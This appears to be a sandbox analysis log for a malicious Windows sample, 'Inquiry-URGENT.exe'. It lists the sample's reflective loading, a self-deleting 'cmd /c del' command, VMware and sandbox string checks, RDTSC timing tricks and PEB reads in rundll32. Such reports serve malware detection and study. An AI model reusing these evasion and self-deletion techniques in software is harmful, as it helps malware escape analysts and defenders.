          Source: 3.0.Inquiry-URGENT.exe.5d0000.0.unpack, Form1.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.Inquiry-URGENT.exe.5d0000.1.unpack, Form1.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0041B85C push eax; ret
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_004150E3 push ebp; retf
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_00415479 pushad ; retf
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0040453C pushfd ; iretd
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_00415F0E push cs; retf
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0041B7F2 push eax; ret
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0041B7FB push eax; ret
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0041B7A5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B6D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009B50E3 push ebp; retf
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009BB85C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009B5479 pushad ; retf
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009A453C pushfd ; iretd
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009BB7A5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009BB7FB push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009BB7F2 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009B5F0E push cs; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.57244291129

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: /c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.671240839.0000000002B43000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Inquiry-URGENT.exe PID: 6760, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 00000000009A8604 second address: 00000000009A860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 00000000009A898E second address: 00000000009A8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe TID: 6524 | Thread sleep time: -35643s >= -30000s
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe TID: 6984 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1376 | Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Thread delayed: delay time: 35643
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Thread delayed: delay time: 922337203685477
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.685379335.000000000FD39000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.701826310.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.713882043.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.701826310.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.682261629.000000000A897000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAb
          Source: explorer.exe, 00000005.00000000.711242824.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.701954450.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.722279904.000000000FD5D000.00000004.00000001.sdmp | Binary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.718318971.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BDE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BCFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BCFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BCD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1DB60 mov ecx, dword ptr fs:[00000030h]
